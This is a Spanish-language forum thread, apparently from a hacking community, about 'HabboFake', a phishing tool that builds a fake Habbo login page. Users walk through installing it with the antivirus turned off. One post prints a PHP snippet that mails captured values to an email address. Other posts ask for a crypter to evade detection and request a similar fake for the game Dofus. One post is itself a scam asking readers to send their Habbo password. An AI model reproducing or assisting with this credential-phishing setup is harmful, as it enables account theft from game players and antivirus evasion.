Muy Bueno pero mejor mirenlo xD

1.cree el hosting
Imagen
(PhonneAccess/Dominio: [Enlace externo eliminado para invitados])
2.Desactive mi AV y descarge xD
3.Descomprimi
4.Modifique el PhP
Imagen

5.Abri el "HabboFake" y en URL puse [Enlace externo eliminado para invitados] y le di en crear HABBOFAKE, me salio Habbo Galaxy puse mis datos para probar y no me llego nada a mi msn xD.

[Bueno tengo dudas como si nececitos sunir cosas a mi hosting con Filezilla bueno no me funka ayuda plz.. xD]

Haber si me explico correctamente con ustedes .

Yo en la configuracion de habbo fake pongo lo siguiente : [email protected]/HabboFake.php

Luego me voy y pongo : <?php
$val = $_GET['value'];
mail ('[email protected]', 'Asunto', $val);
?>

despues de eso q hago ??
Hola a todos. Soy nuevo en el foro y quiero saber si seria posible que hagan post de un fake asi pero para un juego llamado "Dofus"
Imagen
. Si me pueden ayudar, por favor. Diganlo en el foro y yo les hago llegar las imagenes. Ahh y el detalle es que aqui no son creditos como en habbo. Aqui el dinero se hace llamar "Kamas"
Imagen

Ahhh Y Si Quieren Crearse Cuenta En Este Juego. Mandenme Un E-Mail. A [email protected] y yo les envio una invitación.
Muchas Gracias Por Leer!

[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
como lo descargo men
Como puedo hacer que funcione el habbo fake? esque le doi a crear i no me hace nada, tengo un host en mi pc lo e puesto i cuando me intento meter a la .php de habbofake no funciona :S.
Ayuda,ayudenme a instalarlo.
Saludos
Jajaja, yo flipo con los ''novatos'' con perdón, pero este programa tiene un troyano que te cagas patas arriba. Porfavor, antes de descargarlo lo he analizado con el antivirus y me ha salido un troyano, y lo he borrado.

Porfavor, os entreteneis con poner troyanos? Es cosa de niños ... Quién me lo iba a decir, un moderador poniendo troyanos en su web.
Esto es para aplaudir. Menos novatadas y más estudiar.

Por cierto, lo he descargado porque tenía una pinta de troyano terrible. Yo ya tengo un habbo, y no abuso como otros ''viciados'' Yo uso mis sms, pero moderadamente.

Besos y espero que a él le pase lo siguiente...
Nikasim escribió:Jajaja, yo flipo con los ''novatos'' con perdón, pero este programa tiene un troyano que te cagas patas arriba. Porfavor, antes de descargarlo lo he analizado con el antivirus y me ha salido un troyano, y lo he borrado.

Porfavor, os entreteneis con poner troyanos? Es cosa de niños ... Quién me lo iba a decir, un moderador poniendo troyanos en su web.

Por cierto, lo he descargado porque tenía una pinta de troyano terrible. Yo ya tengo un habbo, y no abuso como otros ''viciados'' Yo uso mis sms, pero moderadamente.

Amigo creo que te has encontrado una piedra
por el camino

1º Pon pruebas y dí con imagenes por que tiene un troyano :O
2º el Archivo a sido abierto y no da ningun error :O
3ºEl archivo a sido analizado y no se encuentra nada raro :O
4ºMucha gente lo a abierto y no le da ningun problema ni tiene quejas :O
5ºNo acuses sin pruebas :O
6ºNo creo que un modder y menos de indetectables,haga cosas asin :O
7ºSi lo que has hecho es subirlo a virus-trap, y escanearlo, amigo mio
dedicate a otra cosa :O

Saludos amigo!
Nikasim escribió:Jajaja, yo flipo con los ''novatos'' con perdón, pero este programa tiene un troyano que te cagas patas arriba. Porfavor, antes de descargarlo lo he analizado con el antivirus y me ha salido un troyano, y lo he borrado.

Administradores, baneen a este payaso..
No, enserio, haber te has fijado si intenta conectarse a algún lado?
Crea archivos sospechosos?
Por favor me pego un tiro antes de traicionar a indetectables!

Saludos!
Buenas ami me lo detecta = como un troyano me pueden decir un programa para encriptarlo y dejarlo indetectable plis Salu
haber tio ya me estoy preocupando no respondes al hilo -.- parece k kieres hacer un timo loco explica en value k pongo lo suo solo ¿? responde .
dejen a SharkI el no ha infectado nada nunca y este archivo lo revise yo.Esta totalmente limpio pero sabes que pasa en si acusas sin pruebas y te pones energumeno?¿ pues mira te lo digo
PD:no revivas estos posts.
Blog técnico dedicado a la seguridad informática y al estudio de nuevas vulnerabilidades.
Blog: http://www.seginformatica.net
Twitter: https://twitter.com/#!/p0is0nseginf
hola amigos estoy arto de tantos timos poreso les digo que manden un correo electronico a [email protected] con su
habbo nombre:
habbo contraseña:
y digan cuantos creditos quieren y dentro de un rato le llagaran los creditos chao amigos espero que lo agan los quiero
Esta muy bueno
pero si quieres robar encerio en habbo.es, utiliza javaFake,
ya que con eso solo caen n00bs y que no tienen ni 1 credito xD
Imagen
enlo de:

[Enlace externo eliminado para invitados]? esque nose mucho de informatica :S
Losiento.

Saludos,
espero k me lo respondan
Como se llena este post de xD

Haber, necesitáis subir el php, ha un hosting que permita la función mail() , para no complicaros cambiarlo por un .txt que os funcionara en todos los servidores gratuitos. [Enlace externo eliminado para invitados]
Cerrado

Volver a “Nuestros Programas”